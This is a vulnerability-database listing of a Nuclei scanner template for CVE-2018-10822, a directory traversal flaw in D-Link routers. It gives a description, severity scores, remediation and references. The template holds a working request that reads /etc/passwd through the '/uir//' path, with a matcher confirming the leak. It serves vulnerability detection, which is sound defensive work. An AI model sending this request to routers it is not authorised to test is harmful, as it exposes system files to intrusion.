Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-10822
HistoryJul 24, 2021 - 10:49 p.m.

D-Link Routers - Local File Inclusion

2021-07-2422:49:24
ProjectDiscovery
github.com
8

7.8 High

AI Score

Confidence

High

0.076 Low

EPSS

Percentile

94.1%

D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /… or // after “GET /uir” in an HTTP request to the web interface.

id: CVE-2018-10822

info:
  name: D-Link Routers - Local File Inclusion
  author: daffainfo
  severity: high
  description: D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after "GET /uir" in an HTTP request to the web interface.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the target system
  remediation: |
    Apply the latest firmware update provided by D-Link to fix the vulnerability
  reference:
    - https://www.exploit-db.com/exploits/45678
    - http://sploit.tech/2018/10/12/D-Link.html
    - https://nvd.nist.gov/vuln/detail/CVE-2018-10822
    - https://seclists.org/fulldisclosure/2018/Oct/36
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2018-10822
    cwe-id: CWE-22
    epss-score: 0.10309
    epss-percentile: 0.94824
    cpe: cpe:2.3:o:dlink:dwr-116_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: dlink
    product: dwr-116_firmware
  tags: cve2018,cve,dlink,edb,seclists,lfi,router

http:
  - method: GET
    path:
      - "{{BaseURL}}/uir//etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a00463044022023b69fc16b591f910806097c3c53ecff4c83e36806905b7a865a36fa93bc766f02202fe13b9a6e52cc4f9a56f91c5fc5cdd90030c89d3a2015b6e4658c9d9ac4b1a8:922c64590222798bb761d5b6d8e72950

7.8 High

AI Score

Confidence

High

0.076 Low

EPSS

Percentile

94.1%